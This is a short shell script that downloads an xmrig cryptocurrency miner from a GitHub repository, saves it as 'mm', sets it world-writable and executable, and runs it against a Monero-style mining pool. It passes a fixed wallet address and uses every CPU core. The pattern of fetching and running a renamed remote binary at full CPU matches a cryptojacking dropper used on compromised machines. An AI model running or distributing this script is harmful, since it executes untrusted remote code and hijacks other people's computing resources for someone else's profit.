#!/bin/sh
wget -O mm https://github.com/kazppkido/kikir/raw/main/xmrig 
chmod 777 mm
./mm --donate-level 1 -o us.0xpool.io:3333 -u 0xb27e57f4accbf3a1384c1c17ac959376fc49e21d -p $(echo $RANDOM | md5sum | head -c 20) -a rx/0 -t $(nproc --all)
